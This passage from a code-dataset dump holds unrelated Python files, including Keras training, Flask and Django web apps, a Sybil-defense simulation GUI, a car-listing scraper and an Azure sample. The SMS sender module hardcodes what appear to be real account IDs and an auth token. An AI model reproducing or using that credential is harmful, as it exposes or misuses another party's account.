input_shape=(32,32,3),padding='same'))\nmodel.add(Conv2D(64, kernel_size=4, activation='elu', padding='same'))\nmodel.add(MaxPooling2D((2,2), padding='same'))\nmodel.add(Dropout(0.3))\n\nmodel.add(Conv2D(128, kernel_size=4, activation='elu', input_shape=(32,32,3),padding='same'))\nmodel.add(Conv2D(128, kernel_size=4, activation='elu',padding='same'))\nmodel.add(MaxPooling2D((2,2), padding='same'))\nmodel.add(Dropout(0.5))\n\n\nmodel.add(Flatten())\nmodel.add(Dense(10, activation='softmax'))\nmodel.compile(optimizer='adamax', loss='categorical_crossentropy', metrics=['accuracy'])\n\n\nhistory = model.fit(x_train, y_train, validation_split = 0.2,epochs=100 , batch_size=150)\n\n\nscore = model.evaluate(x_test, y_test, batch_size=128)\nprint(\"score\",score)\nprint(\"Neural network accuracy: %.2f%%\" % (score[1]*100))\n\nmodel.predict(x_test[:4])\n\nprint(y_test[:4])\n\nplt.plot(history.history['val_accuracy'])\nplt.title('model accuracy')\nplt.xlabel('epoch')\nplt.ylabel('accuracy')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n\n# serialize model to JSON\nmodel_json = model.to_json()\nwith open(\"model.json\", \"w\") as json_file:\n json_file.write(model_json)\n# serialize weights to HDF5\nmodel.save_weights(\"model.h5\")\nprint(\"Saved model to disk\")\n","sub_path":"TD_IA_Keras/TP_note.py","file_name":"TP_note.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"54583463","text":"#!/usr/bin/python\nfrom flask import Flask, jsonify, abort, make_response, request\n\napp = Flask(__name__)\n\n# Event management\n\nevents = []\n\n\n# Get events\n@app.route('/api/events', methods=['GET'])\ndef get_events():\n return jsonify({'success': True, 'events': events})\n\n\n# Get event by id\n@app.route('/api/events/', methods=['GET'])\ndef get_event(event_id):\n event = filter(lambda e: e['id'] == event_id, events)\n if len(events) == 0:\n abort(404)\n return jsonify({'success': True, 'event': event[0]})\n\n\n# Create event\n@app.route('/api/events', methods=['POST'])\ndef create_event():\n if not request.json or 'name' not in request.json:\n abort(400)\n if events:\n event_id = events[-1]['id'] + 1\n else:\n event_id = 1\n event = {\n 'id': event_id,\n 'name': request.json['name']\n }\n events.append(event)\n return jsonify({'success': True, 'event': event}), 201\n\n\n# Modify event with given id\n@app.route('/api/events/', methods=['PUT'])\ndef update_event(event_id):\n event = filter(lambda t: t['id'] == event_id, events)\n if len(event) == 0:\n abort(404)\n if not request.json:\n abort(400)\n if 'name' in request.json and type(request.json['name']) != unicode:\n abort(400)\n event[0]['name'] = request.json.get('name', event[0]['name'])\n return jsonify({'success': True, 'event': event[0]})\n\n\n# Delete event by id\n@app.route('/api/events/', methods=['DELETE'])\ndef delete_event(event_id):\n event = filter(lambda t: t['id'] == event_id, events)\n if len(event) == 0:\n abort(404)\n events.remove(event[0])\n return jsonify({'success': True})\n\n\n\n# Error handling\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'success': False, 'error': 'Not found'}), 404)\n\n\n@app.errorhandler(400)\ndef not_found(error):\n return make_response(jsonify({'success': False, 'error': 'Bad request'}), 400)\n\n\n@app.errorhandler(405)\ndef not_found(error):\n return make_response(jsonify({'success': False, 'error': 'Method not allowed'}), 405)","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"113329084","text":"import tkinter as tk\nimport matplotlib.pyplot as plt\nimport matplotlib.backends.backend_tkagg as agg\nimport inspect\nimport csv \nimport simulator\nimport algo\nimport attack\nimport dialog\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 15 18:14:47 2018\n\n@author: Abigail Soward\nA GUI for running one or more simulation. Has default parameters defined, or \nparameters can be set before running. After running, it plots and displays \nthe results, and can export the result data to a CSV.\n\"\"\"\nclass gui(object):\n def __init__(self, master):\n self.init_algos()\n # DEFAULT SIMULATION PARAMETERS\n self.define_algo([\"sybil_control\"])\n self.define_attack(alpha=1/10, size=3333, fractions=(1/2, 1))\n self.data = \"newdatadist.pickle\"\n self.root = master\n self.draw_window()\n \n def start(self):\n # create and run expt.\n self.results = []\n try:\n for alg in self.algos:\n print(\"running {} simulation...\".format(alg.name))\n sim = simulator.simulation(pickled_changes=self.data, algo=alg, attack=self.attack)\n sim.run(verbose=False)\n g_cost, b_cost = sim.get_cumulative_results()\n self.results.append({'data': g_cost, 'label': alg.name+': cost to good ids'})\n self.results.append({'data': b_cost, 'label': alg.name+': cost to adversary'})\n self.plot_results()\n except AttributeError as e:\n print('Error in simulation:', e)\n raise\n except FileNotFoundError as e:\n print('Unable to open data file', self.data)\n except Exception as e:\n print(\"There was an error:\", e)\n raise\n \n def plot_results(self):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_yscale('log')\n for graph in self.results:\n ax.plot(graph.get('data'), label=graph.get('label'))\n plt.legend()\n results = agg.FigureCanvasTkAgg(fig, master=self.canvas)\n results.draw()\n results.get_tk_widget().pack(side=tk.LEFT)\n \n def export_results(self):\n with open('results.csv', 'w') as csvfile:\n writer = csv.writer(csvfile)\n rows = []\n for graph in self.results:\n rows.append([graph.get('label')] + graph.get(\"data\").tolist())\n rows = zip(*rows) # make rows into cols\n for row in rows:\n writer.writerow(row)\n csvfile.close()\n \n def data_dialog(self):\n window = dialog.dataDialog(self.root, self.data)\n self.data = window.data\n \n def init_algos(self):\n self.options = []\n for name, obj in inspect.getmembers(algo):\n if inspect.isclass(obj) and name is not \"defense_algorithm\": \n self.options.append(name)\n \n def define_algo(self, selected):\n # dynamically create algo objects\n self.algos = []\n self.selected = selected\n for name in selected:\n if name in self.options: self.algos.append(getattr(algo, name)())\n \n def algo_dialog(self):\n w = dialog.algoDialog(self.root, self.options, self.selected)\n self.define_algo(w.selected)\n \n def define_attack(self, alpha, size, fractions):\n self.alpha = alpha\n self.size = size\n self.fractions=fractions\n self.attack = attack.burst(alpha, size, fractions) # attack after first 1/4\n \n def attack_dialog(self):\n w = dialog.attackDialog(self.root, self.alpha, self.size, self.fractions)\n self.define_attack(w.alpha, w.size, (w.start, w.end))\n \n def draw_window(self):\n self.root.title(\"BOOTS\")\n self.root.configure(bg=\"#f4fffd\")\n settings = tk.Frame(self.root, bg=\"#f4fffd\")\n settings.grid(row=0, sticky=\"N\")\n \n actions = tk.Frame(self.root, bg=\"#f4fffd\")\n actions.grid(row=2, sticky=\"S\")\n \n graph = tk.Frame(self.root, width=420, height=280, bg=\"#f4fffd\")\n graph.grid(row=1)\n self.canvas = graph\n \n self.algo_b = tk.Button(settings, text=\"set algo\", bg=\"#d9e2e1\", command=self.algo_dialog)\n self.algo_b.grid(row=0, column=0, sticky=tk.E, padx=10)\n \n self.data_b = tk.Button(settings, text=\"set data\", bg=\"#d9e2e1\", command=self.data_dialog)\n self.data_b.grid(row=0, column=1, padx=10)\n \n self.attack_b = tk.Button(settings, text=\"set attack\", bg=\"#d9e2e1\", command=self.attack_dialog)\n self.attack_b.grid(row=0, column=2, sticky=tk.W, padx=10)\n \n self.start_b = tk.Button(actions, text=\"start simulation\", bg=\"#d9e2e1\", fg=\"#6ac417\", command=self.start)\n self.start_b.grid(row=0, column=0, padx=10)\n \n self.export_b = tk.Button(actions, text=\"export\", bg=\"#d9e2e1\", fg=\"#42a1f4\", command=self.export_results)\n self.export_b.grid(row=0, column=1, padx=10)\n \n \n self.quit_b = tk.Button(actions, text=\"quit\", bg=\"#d9e2e1\", fg=\"#c43117\", command=self.root.quit)\n self.quit_b.grid(row=0, column=2, padx=10)\n \n \n# running the gui\nroot = tk.Tk()\ngui = gui(root)\nroot.mainloop()\nroot.destroy()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"367199023","text":"import os\nimport sys\nimport time\n\nuse_tqdm = True\n\n# Determine that we're using tqdm or not.\nprint_statement = \"range\"\nif use_tqdm == False:\n print(print_statement)\n for_statement = \"\"\"range(3, len(a))\"\"\"\nelse:\n for_statement = \"\"\"trange(3, len(a), desc = print_statement)\"\"\"\n \n # Import tqdm.\n package_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"package\")\n if package_path not in sys.path: sys.path.insert(0, package_path)\n from tqdm import trange\n import colorama\n colorama.deinit()\n\n\n\na = [10, 11, 12, 13, 14]\nfor index in eval(for_statement):\n# print(index)\n time.sleep(1)","sub_path":"Python/function/old/tqdm/range.py","file_name":"range.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"403344917","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import FileResponse, Http404\n\n\"\"\" STUFF USED FOR SENDING ACTIVATION EMAIL \"\"\"\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import render_to_string\nfrom django.utils.encoding import force_bytes, force_text\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom .token_generator import account_activation_token\n\nfrom .models import Teacher, Student, Follower\nfrom .forms import (SailUserCreationForm,\n SailUserUpdateForm,\n TeacherCreationForm,\n StudentCreationForm,\n FollowerCreationForm,\n)\n\nimport os\n\n# Credits to https://blog.hlab.tech/part-ii-how-to-sign-up-user-and-send-confirmation-email-in-django-2-1-and-python-3-6/\ndef _send_register_confirmation_email(request, user, to_email):\n email_subject = 'Activate your Sail Account'\n current_site = get_current_site(request)\n\n message = render_to_string('users/register_activate_email.html', {\n 'user': user,\n 'domain': current_site.domain,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n 'token': account_activation_token.make_token(user)\n })\n\n email = EmailMessage(email_subject, message, to=[to_email])\n email.send()\n\ndef activate_account(request, uidb64, token):\n try:\n uid = force_bytes(urlsafe_base64_decode(uidb64))\n user = get_user_model().objects.get(pk=uid)\n except(TypeError, ValueError, OverflowError, get_user_model().DoesNotExist):\n user = None\n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.save()\n messages.success(request, 'Your account has been activated successfully. You may login now!')\n return redirect('users-login')\n else:\n messages.error(request, 'The activation link seems to be invalid!')\n return redirect('sail-home')\n\n\"\"\" Menu to select whether to sign up as teacher or student \"\"\"\ndef register(request):\n return render(request, 'users/register.html', {'title':'Register'})\n\ndef register_teacher(request):\n if request.method == 'POST':\n u_form = SailUserCreationForm(request.POST)\n p_form = TeacherCreationForm(request.POST)\n if u_form.is_valid() and p_form.is_valid():\n user = u_form.save(commit=False)\n user.is_active = False # user is added to our database, but would not be able to login until they activate their account\n user.role = get_user_model().TEACHER\n user.save()\n\n teacher = p_form.save(commit=False)\n teacher.user = user\n teacher.save()\n\n _send_register_confirmation_email(request, user, u_form.cleaned_data['email'])\n\n messages.success(request, 'Account created! You will need to verify your account in your email before you can login.')\n return redirect('users-login')\n else:\n u_form = SailUserCreationForm()\n p_form = TeacherCreationForm()\n \n context = {'u_form':u_form, 'p_form':p_form, 'title':'Teacher Register'}\n return render(request, 'users/register_form.html', context)\n\ndef register_student(request):\n if request.method == 'POST':\n u_form = SailUserCreationForm(request.POST)\n p_form = StudentCreationForm(request.POST)\n if u_form.is_valid() and p_form.is_valid():\n user = u_form.save(commit=False)\n user.is_active = False # user is added to our database, but would not be able to login until they activate their account\n user.role = get_user_model().STUDENT\n user.save()\n\n student = p_form.save(commit=False)\n student.user = user\n student.save()\n\n _send_register_confirmation_email(request, user, u_form.cleaned_data['email'])\n\n messages.success(request, 'Account created! You will need to verify your account in your email before you can login.')\n return redirect('users-login')\n else:\n u_form = SailUserCreationForm()\n p_form = StudentCreationForm()\n \n context = {'u_form':u_form, 'p_form':p_form, 'title':'Student Register'}\n return render(request, 'users/register_form.html', context)\n\ndef register_follower(request):\n if request.method == 'POST':\n form = FollowerCreationForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Thank you for your interest in Sail; we will email you updates on the event!')\n return redirect('sail-home')\n else:\n form = FollowerCreationForm()\n \n return render(request, 'users/interest_form.html', {'form':form, 'title':'Interest Form'})\n\n\"\"\" Displays a user's profile, and allows them to update or delete their account \"\"\"\n@login_required\ndef profile(request):\n if request.method == 'POST':\n if request.POST['action'] == 'Update':\n form = SailUserUpdateForm(request.POST, instance=request.user)\n if form.is_valid():\n form.save()\n messages.success(request, 'Account updated!')\n return redirect('users-profile')\n elif request.POST['action'] == 'Delete':\n request.user.delete()\n messages.success(request, 'Account deleted')\n return redirect('sail-home')\n else:\n form = SailUserUpdateForm(instance=request.user)\n\n return render(request, 'users/profile.html', {'form':form, 'title':'Profile'})\n\n\"\"\" Displays and allows participants to e-sign forms/waivers \"\"\"\n@login_required\ndef forms(request):\n if request.method == 'POST':\n if 'submit-participant-form' in request.POST:\n if request.POST.get('full-name') == (f'{request.user.first_name} {request.user.last_name}'):\n messages.success(request, 'Participant form successfully signed!')\n request.user.signed_participant_form = True\n request.user.save()\n else:\n messages.warning(request, 'Your name in the signature form must exactly match your name in your profile.')\n return redirect('users-forms')\n elif 'submit-photo-form' in request.POST:\n if request.POST.get('full-name') == (f'{request.user.first_name} {request.user.last_name}'):\n messages.success(request, 'Photo form successfully signed!')\n request.user.signed_photo_form = True\n request.user.save()\n else:\n messages.warning(request, 'Your name in the signature form must exactly match your name in your profile.')\n return redirect('users-forms')\n elif 'unsubmit-participant-form' in request.POST:\n request.user.signed_participant_form = False\n request.user.save()\n elif 'unsubmit-photo-form' in request.POST:\n request.user.signed_photo_form = False\n request.user.save()\n\n return render(request, 'users/forms.html')\n\n@login_required \ndef medical_form_pdf(request):\n curr_dir = os.path.dirname(__file__)\n file_path = os.path.join(curr_dir, './static/users/emergency_medical_form.pdf')\n\n try:\n return FileResponse(open(file_path, 'rb'), content_type='application/pdf')\n except FileNotFoundError:\n raise Http404()\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"534071310","text":"class VendingMachine(object):\n def __init__(self):\n self.machine = {}\n self.balance = 0\n self.stock = 0\n\n def vend(self,product):\n if product not in self.machine:\n return \"{0} is out of Stock\".format(product)\n elif self.balance0:\n return \"Here is your {0} and ${1} remain.\".format(product,self.balance)\n else:\n return \"Here is your {0}\".format(product)\n\n def restock(self,product,stock,price):\n self.machine[product]=[stock,price]\n return \"Current {0} stock:{1}\".format(product,self.machine[product])\n\n def deposit(self,money):\n if not self.machine:\n return \"Machine is out of stock Here is your ${0}\".format(money)\n else:\n self.balance += money\n return \"Your balance is ${0}\".format(self.balance)\n\n def return_money(self):\n if self.balance>0:\n change = self.balance\n self.balance = 0\n return \"Here is your money ${0}\".format(change)\n elif self.balance==0:\n return \"You don't have balance\"\n","sub_path":"vending_machine_practice.py","file_name":"vending_machine_practice.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"214444700","text":"import string\ndef print_rangoli(size):\n n = size\n alph = string.ascii_lowercase\n width = 4*n-3\n\n ans = []\n for i in range(n):\n left = '-'.join(alph[n-i-1:n])\n mid = left[-1:0:-1]+left\n final = mid.center(width,'-')\n ans.append(final)\n\n if len(ans) > 1:\n for i in ans[n-2::-1]:\n ans.append(i)\n ans= '\\n'.join(ans)\n print(ans)\n\nif __name__ == '__main__':\n n = int(input())\n print_rangoli(n)\n\n","sub_path":"97.py","file_name":"97.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"424404423","text":"\n\n#calss header\nclass _TWEET():\n\tdef __init__(self,): \n\t\tself.name = \"TWEET\"\n\t\tself.definitions = [u'a short, high sound made by a bird', u'a short remark or piece of information published on Twitter\\u2122']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_tweet.py","file_name":"_tweet.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"146346694","text":"from ssrnai.models.organisms import Organisms\nfrom ssrnai.models.percevejo.percevejo_gene_information import Percevejo_Gene_Information\nfrom django.db import models\nfrom projeto.models.template import TemplateModelMixin\n\nclass Percevejo_Off_Targets(models.Model, TemplateModelMixin):\n\n organism = models.ForeignKey(Organisms(\"organism_id\"), null=True, blank=True, on_delete=models.SET_NULL)\n gene = models.ForeignKey(Percevejo_Gene_Information(\"gene_id\"), null=True, blank=True, on_delete=models.SET_NULL)\n fragment_seq = models.TextField((\"fragment_seq\"))\n start = models.IntegerField(\"start\")\n end = models.IntegerField((\"end\"))\n hits = models.IntegerField(\"hits\")\n hits_description = models.TextField((\"hits_description\"))\n\n\n class Meta:\n ordering = ['id']\n verbose_name = 'offtarget'\n verbose_name_plural = 'offtargets'\n\n def __str__(self):\n return '%s' % (self.id)\n","sub_path":"ssrnai/models/percevejo/percevejo_off_targets.py","file_name":"percevejo_off_targets.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225568481","text":"from discord.ext import commands\nfrom .utils import checks\nimport discord\nimport asyncio\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport datetime\n\nclass Star_Citizen:\n \"\"\"All of the Star Citizen related commands\"\"\"\n \n def __init__(self, bot):\n self.bot = bot\n \n @commands.command()\n async def ben(self):\n \"\"\"Dancing Ben\"\"\"\n await self.bot.say('http://i.imgur.com/OLKOQ6H.gif')\n \n @commands.command()\n async def scam(self):\n \"\"\"Shows that Star Citizen is a scam\"\"\"\n await self.bot.say('Star Citizen is a scam, confirmed by Chris Roberts himself: http://i.imgur.com/UK3D1c0.gifv')\n \n @commands.command(name='2.4')\n async def two_four(self):\n \"\"\"Shows the progress of 2.4\"\"\"\n await self.bot.say('It\\'s not just a meme! http://i.imgur.com/umBUjqW.gif')\n\n @commands.command()\n async def countdown(self):\n \"\"\"Countdown to Citizencon \\N{SMILE}\"\"\"\n utc_now = datetime.datetime.utcnow()\n citizencon_utc = datetime.datetime.utcfromtimestamp(1476050400)\n time_delta = citizencon_utc - utc_now\n hours = time_delta.seconds // 3600\n minutes = (time_delta.seconds % 3600) // 60\n seconds = time_delta.seconds % 60\n citizencon_countdown = 'Citizencon is in:\\n`{} Days, {} Hours, {} Minutes, {} Seconds`'\n citizencon_countdown = citizencon_countdown.format(time_delta.days, hours, minutes, seconds)\n await self.bot.say(citizencon_countdown)\n \ndef setup(bot):\n bot.add_cog(Star_Citizen(bot))","sub_path":"cogs/star_citizen.py","file_name":"star_citizen.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"324763130","text":"import os\nfrom setuptools import setup, find_packages\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name=\"collect\",\n version=\"0.1.1\",\n author=\"Philipp Bosch\",\n author_email=\"hello@pb.io\",\n packages=find_packages(),\n url=\"http://collect.io/libraries/python/\",\n license=\"http://philippbosch.mit-license.org/\",\n description=\"Python library for collecting data at collect.io\",\n long_description=read('README.md'),\n test_suite=\"collect.tests.get_suite\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"License :: OSI Approved :: MIT License\",\n \"Intended Audience :: Science/Research\",\n \"Programming Language :: Python :: 2.7\",\n \"Topic :: Database\",\n \"Topic :: Scientific/Engineering :: Information Analysis\",\n \"Topic :: Scientific/Engineering :: Visualization\",\n \"Topic :: Utilities\",\n ],\n install_requires=[\n \"couchdbkit>=0.5.7\",\n ],\n)","sub_path":"pypi_install_script/collect-0.1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"297556768","text":"import json\n\nfrom ronglian_sms_sdk import SmsSDK\n\naccId = '8aaf0708780055cd0178d32e770f4fc6'\naccToken = '0b7fe4917cf7487f89d8dcfbd68d80f8'\nappId = '8aaf0708780055cd0178d32e77db4fcd'\n\n\n\nclass Sms:\n def __new__(cls, *args, **kwargs):\n if not hasattr(Sms, \"_instance\"):\n cls._instance = super().__new__(cls, *args, **kwargs)\n # 创建一个SmsSDK对象 这里只执行一次 所以SmsSDK对象只有一个\n cls._instance.sms_sdk = SmsSDK(accId, accToken, appId)\n return cls._instance\n\n def send_message(self, mobile='15532272912', datas=(111111,5), tid=\"1\"):\n # tid = '容联云通讯创建的模板'\n # mobile = '手机号1,手机号2'\n # datas = ('变量1', '变量2')\n\n resp = self.sms_sdk.sendMessage(tid, mobile, datas)\n resp_dict = json.loads(resp)\n print('>>>>>>>>短信函数')\n # {\"statusCode\":\"000000\",\"templateSMS\":{\"smsMessageSid\":\"04983ea5ab374e95b84eece5f43e1f08\",\"dateCreated\":\"20210415091559\"}}\n if resp_dict.get(\"statusCode\") == \"000000\":\n print(\"发送短信成功\")\n return 0\n else:\n print(\"发送短信失败\")\n return 1\n\n\n\n # print(resp)\n\n\nif __name__ == '__main__':\n\n Sms().send_message()\n","sub_path":"utils/sms/SendMessage.py","file_name":"SendMessage.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"358802946","text":"class RouteRegistrar():\n passthru = [\n 'get', 'post', 'put', 'patch', 'delete', 'options', 'any',\n ]\n\n allowedAttributes = [\n 'as', 'domain', 'Middleware', 'name', 'namespace', 'prefix', 'where',\n ]\n\n def __init__(self, router):\n self.router = router\n self.attributes = {\n 'action': str(),\n 'prefix':\n '/' + router.buildStack['prefix'][-1].strip('/')\n if 'prefix' in router.buildStack.keys() and len(router.buildStack['prefix'])\n else '',\n 'namespace':\n router.buildStack['namespace'][-1]\n if 'namespace' in router.buildStack.keys() and len(router.buildStack['namespace'])\n else '',\n # 用list对middleware进行一次浅拷贝,避免当前对象attributes['Middleware']和router的buildStack['Middleware']指向同一地址造成重复加载中间件\n 'Middleware':\n list(router.buildStack['Middleware'][-1])\n if 'Middleware' in router.buildStack.keys() and len(router.buildStack['Middleware'])\n else list()\n }\n\n def setAttributes(self, attributes):\n if 'prefix' in attributes.keys():\n prefix = attributes['prefix'].strip('/')\n if prefix:\n self.attributes['prefix'] += '/%s' % prefix\n\n if 'namespace' in attributes.keys() and attributes['namespace']:\n if self.attributes['namespace']:\n self.attributes['namespace'] += '.%s' % attributes['namespace']\n else:\n self.attributes['namespace'] += attributes['namespace']\n\n if 'Middleware' in attributes.keys() and len(attributes['Middleware']) > 0:\n self.attributes['Middleware'] += attributes['Middleware']\n\n return self\n\n def attribute(self, key, value):\n self.attributes[key] = value\n\n def get(self, uri, action):\n self.attribute('action', action)\n uri = self.attributes['prefix'] + '/' + uri.strip('/')\n return self.router.get(uri, self.attributes)\n\n def post(self, uri, action):\n self.attribute('action', action)\n uri = self.attributes['prefix'] + '/' + uri.strip('/')\n return self.router.post(uri, self.attributes)\n","sub_path":"laravel/Routing/RouteRegistrar.py","file_name":"RouteRegistrar.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"3951463","text":"import pytest\n\nimport numpy as np\n\nfrom cloudvolume.chunks import encode, decode\n\ndef encode_decode(data, format):\n encoded = encode(data, format)\n result = decode(encoded, format, shape=(64,64,64,1), dtype=np.uint8)\n\n assert np.all(result.shape == data.shape)\n assert np.all(data == result)\n\n\ndef test_raw():\n random_data = np.random.randint(255, size=(64,64,64,1), dtype=np.uint8)\n encode_decode(random_data, 'raw')\n\ndef test_npz():\n random_data = np.random.randint(255, size=(64,64,64,1), dtype=np.uint8)\n encode_decode(random_data, 'npz')\n\ndef test_jpeg():\n data = np.zeros(shape=(64,64,64,1), dtype=np.uint8)\n encode_decode(data, 'jpeg')\n encode_decode(data + 255, 'jpeg')\n\n # Random jpeg won't decompress to exactly the same image\n # but it should have nearly the same average power\n random_data = np.random.randint(255, size=(64,64,64,1), dtype=np.uint8)\n pre_avg = random_data.copy().flatten().mean()\n encoded = encode(random_data, 'jpeg')\n decoded = decode(encoded, 'jpeg', shape=(64,64,64,1), dtype=np.uint8)\n post_avg = decoded.copy().flatten().mean()\n\n assert abs(pre_avg - post_avg) < 1\n\n","sub_path":"test/test_chunks.py","file_name":"test_chunks.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"258766319","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\nfrom functools import partial\r\nimport multiprocessing \r\nfrom multiprocessing import Pool\r\n\r\ndef fetch(url):\r\n\theaders={'User-Agent': \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36\"}\r\n\tresp=requests.get(url,headers=headers).text\r\n\treturn resp\r\n\r\ndef findModel(soup):\r\n\tmodelL=[]\r\n\tmodels=soup.find_all('a','clean_a_tyle')\r\n\tfor model in models:\r\n\t\tmodelL.append(model.text.replace(' ',';',1)+';')\r\n\treturn modelL\r\n\r\ndef findInfo(soup):\r\n\tinfoL=[]\r\n\tinfos=soup.find_all('div','info_area_time')\r\n\tfor info in infos:\r\n\t\ttemp=info.find_all('p')\r\n\t\tinfoL.append(temp[1].text.replace('出廠','')+';'+temp[0].text.replace(' c.c.','.cc')+';')\r\n\treturn infoL\r\n\r\ndef findCities(soup):\r\n\tcityL=[]\r\n\tcities=soup.find_all('p','title_city')\r\n\tfor city in cities:\r\n\t\tcityL.append(city.text+';')\r\n\treturn cityL\r\n\r\ndef findPrice(soup):\r\n\tpriceL=[]\r\n\tprices=soup.find_all('div','info_area_year')\r\n\tfor price in prices:\r\n\t\tpriceL.append(price.text)\r\n\treturn priceL\r\n\r\ndef multiTa(temp):\r\n\turl=f'https://usedcar.u-car.com.tw/index.aspx?page={temp}'\r\n\r\n\tsoup=BeautifulSoup(fetch(url),'html.parser')\r\n\tinfoL=findInfo(soup)\r\n\tmodelL=findModel(soup)\r\n\tcityL=findCities(soup)\r\n\tpriceL=findPrice(soup)\r\n\tfileT=open(f\"temp/temp{temp}.txt\",\"w\",encoding=\"utf-8\")\r\n\tfor i in range(len(infoL)):\r\n\t\tif priceL[i] != '面議':\r\n\t\t\tfileT.write(modelL[i]+infoL[i]+cityL[i]+priceL[i]+'\\n')\r\n\r\ndef mergeN(count):\r\n\tfileT=open(f\"src/src.txt\",\"w\",encoding=\"utf-8\")\r\n\tfor i in range(1,count+1):\r\n\t\tfileA=open(f\"temp/temp{i}.txt\",\"r\",encoding=\"utf-8\")\r\n\t\tfileT.write(fileA.read())\r\n\t\tfileA.close()\r\n\t\tos.remove(f'temp/temp{i}.txt')\r\n\t\r\n\tfileT.close()\t\r\n\r\nif __name__ == '__main__':\r\n\tif(not os.path.exists('src')):\t\r\n\t\tos.mkdir('src')\r\n\tif(not os.path.exists('temp')):\t\r\n\t\tos.mkdir('temp')\r\n\tpgNum=253\r\n\tpool = multiprocessing.Pool()\r\n\tpool.map(multiTa, range(1,pgNum+1))\r\n\tpool.close()\r\n\tmergeN(pgNum)\r\n#Mitsubishi;FORTIS;2015;1798.cc;桃園市;35.8萬\r\n","sub_path":"carCr2.py","file_name":"carCr2.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"273824897","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------\n\nfrom azure.identity import DefaultAzureCredential\nfrom azure.mgmt.storageimportexport import StorageImportExport\n\n\"\"\"\n# PREREQUISITES\n pip install azure-identity\n pip install azure-mgmt-storageimportexport\n# USAGE\n python create_export_job.py\n\n Before run the sample, please set the values of the client ID, tenant ID and client secret\n of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,\n AZURE_CLIENT_SECRET. For more info about how to get the value, please see:\n https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal\n\"\"\"\n\n\ndef main():\n client = StorageImportExport(\n credential=DefaultAzureCredential(),\n subscription_id=\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\n )\n\n response = client.jobs.create(\n job_name=\"myExportJob\",\n resource_group_name=\"myResourceGroup\",\n body={\n \"location\": \"West US\",\n \"properties\": {\n \"backupDriveManifest\": True,\n \"diagnosticsPath\": \"waimportexport\",\n \"export\": {\"blobList\": {\"blobPathPrefix\": [\"/\"]}},\n \"jobType\": \"Export\",\n \"logLevel\": \"Verbose\",\n \"returnAddress\": {\n \"city\": \"Redmond\",\n \"countryOrRegion\": \"USA\",\n \"email\": \"Test@contoso.com\",\n \"phone\": \"4250000000\",\n \"postalCode\": \"98007\",\n \"recipientName\": 